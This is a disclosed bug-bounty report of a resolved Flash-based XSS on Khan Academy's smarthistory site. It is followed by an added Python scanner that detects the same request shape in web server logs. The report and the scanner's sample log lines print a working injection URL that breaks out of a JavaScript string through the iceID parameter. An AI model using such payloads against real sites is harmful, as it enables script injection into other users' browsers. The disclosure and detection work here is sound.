XSS at http://smarthistory.khanacademy.org

Disclosed: 2014-04-09 04:33:45 By prakharprasad To khanacademy
Vulnerability Details
Hi,

There is a SWF-based XSS:

http://smarthistory.khanacademy.org/assets/flash/cozimo.swf?iceID=\%22%29%29}catch%28e%29{alert%28%27XSS%27%29;}//

Opening the link would trigger JavaScript execution! Works in possibly any browser with **Adobe Flash, i.e. Chrome, Firefox**.

Thanks!
Report Stats
  • Report ID: 6575
  • State: Closed
  • Substate: resolved
  • Upvotes: 6
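
A defender-side check for this request shape in web server logs, added here as an example and not part of the original report: it percent-decodes the query parameters of `.swf` requests (repeatedly, to catch double encoding) and flags values containing the characters the reported query string depends on. The function names, the constructed log lines and the premise that legitimate parameter values never contain these characters are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters the reported payload relies on to leave a quoted JavaScript
# string and call expression. Assumption: legitimate values never need them.
JS_BREAKOUT = re.compile(r"""[\\"'(){};]""")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(rounds):
        once = unquote_plus(value)
        if once == value:
            break
        value = once
    return value

def suspicious_swf_params(url):
    """Return [(name, decoded_value)] for .swf query parameters that carry
    JavaScript break-out characters after decoding."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".swf"):
        return []
    hits = []
    # Split on '&' only: the reported value contains a literal ';'.
    for pair in filter(None, parts.query.split("&")):
        name, _, raw = pair.partition("=")
        value = decode(raw)
        if JS_BREAKOUT.search(value):
            hits.append((unquote_plus(name), value))
    return hits

def scan(log_lines):
    """Return [(line_number, name, value)] for every flagged request."""
    found = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m:
            found += [(n, k, v) for k, v in suspicious_swf_params(m.group(1))]
    return found

# Constructed access-log lines; line 2 carries the query string from the report,
# line 3 is a constructed double-encoded variant.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2014:10:00:00 +0000] "GET /assets/flash/cozimo.swf?iceID=abc123 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2014:10:00:07 +0000] "GET /assets/flash/cozimo.swf?iceID=\\%22%29%29}catch%28e%29{alert%28%27XSS%27%29;}// HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2014:10:00:09 +0000] "GET /assets/flash/cozimo.swf?iceID=%255C%2522%2529 HTTP/1.1" 200 5120',
]
```

Calling `scan(SAMPLE_LOG)` returns the flagged line numbers with the decoded parameter values, which is what an analyst would review or feed into an alert.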